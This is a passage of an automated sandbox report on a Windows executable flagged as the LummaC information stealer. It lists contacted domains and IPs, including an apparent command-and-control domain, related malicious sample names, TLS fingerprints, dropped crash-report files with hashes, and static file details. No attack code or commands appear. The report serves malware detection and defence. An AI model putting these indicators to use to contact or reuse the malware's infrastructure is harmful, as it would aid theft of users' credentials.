                                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://ac.ecosia.org/autocomplete?q=MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                172.67.157.254
                                                                                                                                                                                                                                                		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                23.55.153.106
                                                                                                                                                                                                                                                		steamcommunity.comUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                Analysis ID:1581627
                                                                                                                                                                                                                                                Start date and time:2024-12-28 10:04:17 +01:00
                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 5m 20s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:10
                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                Sample name:MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                                Original Sample Name:1663e17268ae9d60dd70ae27b8ea43ab.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@2/5@10/2
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                                                                                • Number of executed functions: 24
                                                                                                                                                                                                                                                • Number of non-executed functions: 227
                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.182.143.212, 4.245.163.56, 20.190.177.20
                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                04:05:14API Interceptor11x Sleep call for process: MPgkx6bQIQ.exe modified
                                                                                                                                                                                                                                                04:05:40API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                172.67.157.254l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    23.55.153.106l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        lev-tolstoi.coml0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                                        5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                                        TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                                        steamcommunity.comSQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        AKAMAI-ASN1EUl0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        CLOUDFLARENETUSl0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                                        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.2.51
                                                                                                                                                                                                                                                                                        5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254

                                                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MPgkx6bQIQ.exe_2011b138ac455d995f7acf973a698df9d121fa7_e5f322ad_72b48338-f3e5-4d3d-9f77-17d159b4ea3c\Report.wer

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0657929474574444
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:WvZiEFmzk0ABptju3mFXzuiF1Z24IO87:WBFmrABptjLXzuiF1Y4IO87
                                                                                                                                                                                                                                                                                        MD5:1FA9B33F1EB72B54C361D08E1F99FB29
                                                                                                                                                                                                                                                                                        SHA1:9842F8247CB175F09D84441107024C1F6DFB5E68
                                                                                                                                                                                                                                                                                        SHA-256:E484024903EDC6180FD1940F1AA4F38C12E803970D9E4D2B08FBAC64CA23CDEF
                                                                                                                                                                                                                                                                                        SHA-512:523B08914E381623FAD32B817B692B20438801C09F42042A437FCFFC989EE0BAA2FCE73780E7B1DDB27AFE6B7498F07449EAA511DF0C3838507DFB1FE866DCFA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.0.3.3.0.4.0.6.2.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.0.3.3.1.7.1.8.7.1.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.b.4.8.3.3.8.-.f.3.e.5.-.4.d.3.d.-.9.f.7.7.-.1.7.d.1.5.9.b.4.e.a.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.f.c.2.2.e.1.-.6.9.6.7.-.4.d.d.9.-.9.e.f.b.-.6.5.0.f.1.1.2.e.2.f.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.P.g.k.x.6.b.Q.I.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.0.0.-.0.0.0.1.-.0.0.1.4.-.b.0.7.4.-.9.2.9.9.0.7.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.0.e.1.e.c.9.5.5.8.1.6.2.0.c.6.8.f.0.c.c.6.a.d.7.4.0.3.7.0.0.9.0.0.0.0.f.f.f.f.!.0.0.0.0.9.5.a.8.4.7.5.a.8.6.8.2.1.8.8.c.8.a.9.9.d.6.6.b.3.5.a.0.1.5.7.c.b.8.7.8.8.2.1.9.!.M.P.g.k.x.6.b.Q.I.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E15.tmp.dmp

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sat Dec 28 09:05:30 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):108078
                                                                                                                                                                                                                                                                                        Entropy (8bit):2.1686264816718217
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:768:FeAAkFp1QTB2Ws4k7oxWId735+ZFd8LIRtxJN:YAAkv1XWs4nxW2N+ZFd8L+txJN
                                                                                                                                                                                                                                                                                        MD5:3AC5D6718DE691F30A69F21A22B23830
                                                                                                                                                                                                                                                                                        SHA1:36D3CA05A07D2058F264DE5F57AB431DE18E542B
                                                                                                                                                                                                                                                                                        SHA-256:E63D72B6AB77580DA32682F8C6FAC2C71BAFC6339DC1B4EF4A1C3A9112656344
                                                                                                                                                                                                                                                                                        SHA-512:22659699F09E0672EB84B04C446B92E8577FBF93D700FBC2A995DFDB531244FE24DEFC05AD90863D5F146613CCA49C38B9B73BAA2939D43559EAF251AAA6DDC1
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:MDMP..a..... .......Z.og........................p...............h$......d....P..........`.......8...........T............F...`..........L%..........8'..............................................................................eJ.......'......GenuineIntel............T...........G.og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER81C0.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):8430
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6981819956987767
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJMF6Iqa+e6YS5SUA3gmfW9spDO89bxnsfObm:R6lXJ26Iqq6YMSUA3gmfymxsfT
                                                                                                                                                                                                                                                                                        MD5:5AA6EE745D923D0DA8BB32132FF7060E
                                                                                                                                                                                                                                                                                        SHA1:2708E48A64A10BDFFE0F47AEAB39B9398BB460AE
                                                                                                                                                                                                                                                                                        SHA-256:22C5C9E4961922190D70E653854257955B938D7898E1FDD1A4E8DE558E8B13BC
                                                                                                                                                                                                                                                                                        SHA-512:1A944D226FFF314F7CF427F77D2FBF828B7D3FF3A2DAB9BDBED9B413C9280772DF0439BC60A7EFF2D9B5CDA8C0C58C50A1A05CE092B14310B351C2B05D02A808
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.8.0.<./.P.i.

                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER825D.tmp.xml

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):4724
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.490020990740064
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsLJg77aI9b4WpW8VYEYm8M4J/Bx9HO3FA+q8vEx9HOLTvWKsttz3thQd:uIjflI7Rx7VAJ/BnFKEn2vWKEtz3thQd
                                                                                                                                                                                                                                                                                        MD5:7683F954233BDDFB469EC53B45A5AB4C
                                                                                                                                                                                                                                                                                        SHA1:3CEF71A4CB64A350E95335C4978D1271BD5DF67B
                                                                                                                                                                                                                                                                                        SHA-256:67F5D233516290F70E8F534ACEAA43EC643A53C1BA9561C1BA6031E3EB15A710
                                                                                                                                                                                                                                                                                        SHA-512:14D9332B2249774B8121102CDB603DF00933AACFAF7C3FAD8F7B406C0C033EA292CF4585A64AEF0FA5509F6852D080DFFFF5390B04572324D76BAEC415B34B30
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650888" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.372103478837162
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:yFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNHiL:aV1QyWWI/glMM6kF7Jq
                                                                                                                                                                                                                                                                                        MD5:DA453124C3E84ECF76FB991F75A8818E
                                                                                                                                                                                                                                                                                        SHA1:06B0FDF58B03C64C88EDD346ED737A75B0394188
                                                                                                                                                                                                                                                                                        SHA-256:C067AF89BCCE43E7474E36FDA392AE02D5E94A6ADA6009AD53025806E28F51D2
                                                                                                                                                                                                                                                                                        SHA-512:BC25401D07AA46CC8CA9123909790649C15C9D947C38A1F29B9CA1855EF0A086220DF6332C1BD514CF7C35EEDF6A7491F85B9AE43BD6468C98C41A395E2EAC14
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZX..Y...............................................................................................................................................................................................................................................................................................................................................[.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.414774815934241
                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                        File name:MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        File size:375'296 bytes
                                                                                                                                                                                                                                                                                        MD5:1663e17268ae9d60dd70ae27b8ea43ab
                                                                                                                                                                                                                                                                                        SHA1:95a8475a8682188c8a99d66b35a0157cb8788219
                                                                                                                                                                                                                                                                                        SHA256:fbc834cf913a08c6e1cba50ca8dc2b072a4e252f12448a7f5e95d3a0b1de6b7a
